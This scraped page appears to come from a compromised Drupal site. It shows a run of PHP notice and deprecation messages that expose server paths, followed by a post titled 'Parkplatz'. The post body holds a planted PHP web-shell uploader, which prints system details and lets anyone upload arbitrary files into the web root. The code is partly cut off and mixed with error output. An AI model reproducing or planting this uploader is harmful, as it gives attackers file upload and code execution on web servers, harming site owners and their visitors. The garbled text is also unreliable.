Error message

  • Notice: Trying to access array offset on value of type int in element_children() (line 6394 of /www/htdocs/w0113161/version1.0/includes/common.inc).
  • Notice: Trying to access array offset on value of type int in element_children() (line 6394 of /www/htdocs/w0113161/version1.0/includes/common.inc).
  • Notice: Trying to access array offset on value of type int in element_children() (line 6394 of /www/htdocs/w0113161/version1.0/includes/common.inc).
  • Notice: Trying to access array offset on value of type int in element_children() (line 6394 of /www/htdocs/w0113161/version1.0/includes/common.inc).
  • Notice: Trying to access array offset on value of type int in element_children() (line 6394 of /www/htdocs/w0113161/version1.0/includes/common.inc).
  • Notice: Trying to access array offset on value of type int in element_children() (line 6394 of /www/htdocs/w0113161/version1.0/includes/common.inc).
  • Notice: Trying to access array offset on value of type int in element_children() (line 6394 of /www/htdocs/w0113161/version1.0/includes/common.inc).
  • Notice: Trying to access array offset on value of type int in element_children() (line 6394 of /www/htdocs/w0113161/version1.0/includes/common.inc).
  • Deprecated function: Array and string offset access syntax with curly braces is deprecated in include_once() (line 14 of /www/htdocs/w0113161/version1.0/themes/engines/phptemplate/phptemplate.engine).
  • Deprecated function: The each() function is deprecated. This message will be suppressed on further calls in _menu_load_objects() (line 569 of /www/htdocs/w0113161/version1.0/includes/menu.inc).
  • Deprecated function: Methods with the same name as their class will not be constructors in a future version of PHP; views_display has a deprecated constructor in require_once() (line 3097 of /www/htdocs/w0113161/version1.0/includes/bootstrap.inc).
  • Deprecated function: Methods with the same name as their class will not be constructors in a future version of PHP; views_many_to_one_helper has a deprecated constructor in require_once() (line 113 of /www/htdocs/w0113161/version1.0/sites/all/modules/ctools/ctools.module).
  • Deprecated function: implode(): Passing glue string after array is deprecated. Swap the parameters in drupal_get_feeds() (line 394 of /www/htdocs/w0113161/version1.0/includes/common.inc).

Hsuwuw

Parkplatz

root's picture
"; echo "".php_uname()."
"; echo "
"; $root = $_SERVER['DOCUMENT_ROOT']; $files = $_FILES['idx_file']['name']; $dest = $root.'/'.$files; if(isset($_POST['upload'])) { if(is_writable($root)) { if(@copy($_FILES['idx_file']['tmp_name'], $dest)) { $web = "http://".$_SERVER['HTTP_HOST']."/"; echo "sukses COk..!!!!! -> $web/$files"; } else { echo "gagal upload di document root."; } } else { if(@copy($_FILES['idx_file']['tmp_name'], $files)) { echo "sukses upload $files di folder ini"; } else { echo "gagal upload"; } } } ?>